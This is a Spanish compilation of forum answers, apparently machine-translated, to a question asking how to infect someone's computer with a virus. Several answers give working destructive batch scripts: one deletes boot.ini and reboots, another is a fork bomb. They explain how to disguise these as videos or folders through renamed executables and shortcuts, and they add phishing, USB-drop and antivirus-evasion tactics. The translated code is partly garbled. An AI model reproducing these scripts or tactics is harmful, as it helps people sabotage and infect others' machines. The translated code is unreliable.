¿Cuál es la forma más sencilla de infectar la computadora de alguien con un virus?

La respuesta trata con Windows. No estabas buscando una manera de infectar Linux o Mac, ¿verdad?

Te doy 3 métodos probados.

1. El archivo boot.ini.

Este es probablemente el truco más hábil que conozco, pero lamentablemente solo funciona en Windows XP (que por cierto todavía tiene una participación de mercado del 29%).

Este archivo mágico es lo que estamos apuntando.

Todo lo que tiene que hacer es eliminar el archivo C: \ Boot.ini y reiniciar el sistema. Y resulta en este error en el momento del arranque.

Curiosamente, el error ni siquiera menciona boot.ini ni nada relacionado de forma remota.

Ahora solo necesita un script que elimine ese archivo. Puede codificar eso en cualquier idioma que desee, pero como sabemos que estamos apuntando a Windows, también podríamos usar algo que se ejecute de forma nativa en él: los scripts Batch o Visual Basic son dos de ellos. Aquí está el guión.

del% SYSTEMDRIVE% \ boot.ini
apagado / r

Nota: No todas las personas tienen su sistema operativo instalado en C, por lo que, para que sea seguro, utilizamos la variable de entorno% SYSTEMDRIVE%.

Guarde el script como “Porn Video.bat” y listo. Envíalo a tu amigo y causa estragos. Podrías pensar que la gente no caerá, pero créeme, no hay absolutamente ningún límite para la estupidez humana. Solía ​​hacer esto a través de IRC, engañando a personas aleatorias que conoces y, a veces, ¡solían ejecutarlo y chico! La diversión que tuve.

Una de las razones por las que las personas no ejecutan archivos Batch es porque se ven basura …

Quiero decir, míralo, ¿alguna vez harás clic en algo así?


Hagamos que nuestro bebé se vea bien entonces.

Primero, necesita una herramienta para compilar su script en un EXE. Usé esto: Bat To Exe Converter pero también puedes encontrar fácilmente otras herramientas. Una de las ventajas de esta herramienta es que puede cambiar el icono del ejecutable resultante.

Mi favorito personal es el icono de carpeta: nadie duda de que una carpeta pueda ser un virus. Elige tu opción:


El ícono importa mucho

Esta vez cambié el ícono al ícono de VLC (como sabía que el tipo lo tenía instalado) y cambié el nombre del archivo a “Katrina Kaif – Boom” = D

¿En cuál harías clic? El derecho, ¿verdad?

En caso de que todo esto sea específico para XP, el siguiente también funciona en todos los Win 7 y 8 conocidos.

2. La bomba tenedor.

Antes de seguir leyendo, solo prométeme una cosa: en realidad vas a ejecutar esto en tu sistema.

Pinky juro?

Bien entonces.

Aquí está el código:

:una
inicio% 0
ir a

Guárdelo como “Cool Shit.bat”. NO lo ejecutes todavía. Leer primero …

Lo que hacen estas tres líneas de código es seguir llamando al script una y otra vez, un bucle infinito. Es como una bomba de hidrógeno o algo que crece exponencialmente. Comienzas con 1 proceso, luego 2, 4, 8, 16, 32, 64 … hasta el infinito. Pronto, toda su pantalla estará llena de un montón de ventanas de símbolo del sistema.

Ahora, si no tienes nada crítico que hacer. Te insto a que vayas y ejecutes ese archivo. Probablemente sea lo más hermoso que vea todo el día y la única razón por la que no adjunto una captura de pantalla es porque quiero que tenga una experiencia de primera mano de cuán hermoso (y aterrador) puede ser el código.

3. El atajo.

Esta no es una idea de virus per se, sino un truco para ocultar lo que has creado y aumentar las posibilidades de tu ataque.

¿Recuerdas cómo te dije que compilaras scripts BAT para EXEs? Bueno, ese método no funcionará, al menos hoy, ya que los ejecutables son fácilmente marcados por los antivirus. Es hora de mejorar nuestro juego.

Ingrese los accesos directos de archivos de Windows.

La mejor parte de un acceso directo, además de ser accesos directos, es que puede cambiar sus iconos y modificar sus propiedades de destino para ejecutar comandos de shell.

Hagamos esto lentamente:

1. Copie uno de esos scripts por lotes a una carpeta (quizás un pendrive).

2. Ahora cree un acceso directo de ese script en la misma carpeta (consejo: seleccione el archivo, mantenga presionada la tecla alt, arrastre y suelte).

3. Cambie el nombre y el ícono del acceso directo (a una carpeta)

4. Ocultar el guión original.

Ahora envíe este script junto con el acceso directo a su presa (personalmente me he enamorado de este).

Puede mejorar significativamente sus posibilidades combinando estrategias y adaptándose según sea necesario.

Si este tipo de cosas te entusiasma, me gustaría que eches un vistazo a algunos de los guiones que he creado: Github – AHK Pranks No son virus en sentido estricto, pero pueden usarse para jugar bromas a las personas.

Esta pregunta me recordó a dos de mis virus reales que no están en Github. Editaré la pregunta cuando los suba.

No te olvides de ejecutar la bomba. Sabes lo que les sucede a las personas que rompen promesas rosadas, ¿verdad?

Copie su ejecutable de virus en una memoria USB portátil. Asegúrese de cambiar el nombre del archivo a virus.exe. Entréguele el stick a la persona que tiene la computadora que desea infectar, y dígale que desactive todos los programas antivirus y antimalware en ejecución que pueda tener, y que inserte y ejecute el programa contenido en el stick. Asumir que es tan idiota como usted por preguntar esto, esa es, con mucho, la forma más fácil de infectar su computadora con un virus.

Algunos pasos fáciles de seguir para personas no técnicas:

  1. Herpes por contrato
  2. Espere hasta que la víctima prevista pueda usar su computadora dentro de 4 horas
  3. Ponga el área infectada en contacto con el teclado de la persona.

Si está dispuesto a infectar la computadora con bacterias , entonces eso abre una gran cantidad de opciones de ataque más duraderas.

Creé una opción altamente adaptable donde puede insertar comandos maliciosos en cualquier lugar que desee. Esta es una buena base, disfrazada como una herramienta de piratería de juegos de trabajo. Aquí está mi código:

@echo off

título MCrasher 1.0.2

color e

echo = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – =

echo Bienvenido a MCrasher

eco hecho por RedDaHacker

echo = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – = – =

set / p resolve = Si desea resolver un nombre de host, presione 1. De lo contrario, presione 2. Resolver:

if “% resolve%” == “1” goto: resolve

:currículum

SET / P ip = Ingrese una IP del servidor (NUMÉRICO):

echo% ip% seleccionado.

:procesar de nuevo

Método set / p = ¿Qué método usar? [1: PING, 2: TCP, 3: LENTO, 4: KHS, 5: STACK, 6: CORRUPT]:

if “% method%” == “1” goto: pod

if “% method%” == “2” goto: tcp

si “% method%” == “3” goto: lento

if “% method%” == “4” goto: khs

if “% method%” == “5” goto: stack

if “% method%” == “6” goto: corrupto

echo ¡Método no válido!

goto: reintentar

:vaina

ping% ip% -t -l 65500

goto: pod

: tcp

echo Packet recibido por% ip%

goto: tcp

:lento

echo Consumir todos los sockets en% ip% …

goto: lento

: khs

echo Contactando a la botnet de KHS …

echo Botnet conectado! KHS te da la bienvenida!

set / p pow = Establecer potencia de botnet [1/10000]:

: khsl

echo Usando% pow% bots para atacar% ip%….

goto: khsl

:apilar

set / p stk = Stacksize (en mb, preferiblemente MÁS DE 200)

: stkl

echo Usando% stk% mb carga sobredimensionada para bloquear% ip% …

goto: stkl

:corrupto

echo Enviando paquetes dañados a% ip% …

ir a: corrupto

:resolver

set / p host = Ingrese el nombre de host:

ping% host% -w 1 -n 1

pausa

goto: resume

Inserte algunos comandos maliciosos después de: los métodos y observe cómo se enciende su PC B-)

Si tiene acceso físico a la computadora mientras está desbloqueada:

  • Inserte una unidad USB con malware e infecte la PC usted mismo. Debe tratarse de malware que haya probado para asegurarse de que el antivirus no lo detecte. VirusTotal es un buen lugar para verificar esto.
  • Organice su malware en una dirección accesible por Internet y escriba la URL para descargar el malware.

Si no tiene acceso a la computadora pero conoce la dirección de correo electrónico del objetivo:

  • Envíe por correo electrónico el malware en un archivo zip protegido con contraseña e incluya la contraseña. Haga una buena historia en el correo electrónico sobre por qué deberían abrirse y luego instale el malware (ingeniería social).
  • Suplantación de identidad (phishing): incluya un correo electrónico dirigido al malware o un sitio web explotado para aprovechar las aplicaciones vulnerables instaladas en el escritorio del usuario. Cuanto más creíble sea el correo electrónico, más posibilidades tendrá de que el usuario lo abra y haga clic en el enlace.

La parte más difícil es crear malware que no será detectado por un antivirus y construir la infraestructura de comando y control. Sin embargo, todo esto se puede externalizar a ciberdelincuentes experimentados.

Bueno, de acuerdo con este artículo académico bastante reciente sobre la seguridad del sistema informático, la forma más fácil es colocar un USB con un virus autoinstalable donde lo encuentren.

https://zakird.com/papers/usb.pdf

La apertura más dolorosa para todos los sistemas de seguridad no es la interfaz. O la contraseña. O la computadora. Del hecho de que los edificios tienen ventanas. En todo lo que requiere seguridad, desde edificios hasta computadoras, desde sistemas de archivos hasta cajas fuertes, la vulnerabilidad más difícil de eliminar es el hecho de que las personas son estúpidas y / o hacen cosas estúpidas.

Probablemente phishing, el mismo método que utiliza el Ransomware. Puede enviar el virus a la víctima como un archivo adjunto a un correo electrónico, el correo electrónico debe aparecer ante la víctima como algo legítimo e importante para engañarlo para que instale el virus.

Por eso se llama phishing. Es la forma más fácil de infectar a alguien porque la víctima hace todo el trabajo por usted, no necesita buscar hazañas de seguridad y trucos expertos en tecnología. Solo engaña a la víctima para que instale el virus él mismo.

No aliento el acto de infectar a las personas en línea, esta información solo se proporciona para el entretenimiento.

Puede revertir la instalación de Windows de alguien a la instalación base y luego visitar muchos sitios sombreados. La razón para degradar Windows es eliminar los parches, lo que facilita la infección.

Por supuesto, no lo hagas, porque eso puede meterte en problemas por alterar su computadora.

por favor no espere una respuesta a esta pregunta, esta es la razón por la cual

La respuesta puede dañar a alguien.

Debe preguntar cómo se puede probar un programa antivirus si funciona o no.

Aquí hay un enlace que puede dar detalles.

Archivo de prueba EICAR

Aquí hay una lista completa de virus que se pueden crear usando el bloc de notas 20 Virus usando NotePad Muy peligroso

Y el software que abrirá el archivo de imagen debe tener un desbordamiento de búfer o una vulnerabilidad que ejecute los datos del archivo de imagen como código ejecutable.

Si lo está enviando a través de un archivo exe, trabajar en un archivo de imagen no tendría sentido. Los archivos exe son imágenes peligrosas en sí mismos.

Cifrar código malicioso en un archivo de imagen NO funcionará. Cuando encriptas algo, la parte receptora necesita otra clave para decodificarlo. Si no puede decodificar el código malicioso, nunca sabrá el orden correcto de los caracteres aleatorios cifrados que formarán un flujo significativo de código.

Los archivos de imagen pueden contener algunos datos de imagen adicionales, que de hecho son códigos maliciosos. Y ese código se ejecutará si y solo si la otra parte tiene un abridor de imágenes vulnerable. Es el SW vulnerable tiene que ser el predeterminado.

La idea encriptada, etc., etc. es fantástica.

Y Exe es el más común. El más fácil de atrapar. La mayoría de los clientes de correo electrónico ni siquiera abren un archivo exe, lo que indica que es peligroso.

  1. Conecte un USB infectado con un malware o rootkit de ejecución automática cuando no se note
  2. Adjunto de correo electrónico o enlace incrustado
  3. Script / sitio web malicioso

LO QUE USTED HACE CON ESTA INFORMACIÓN ES SU LLAMADA, NO REGALO, NI SOY RESPONSABLE DE NINGUNA MANERA.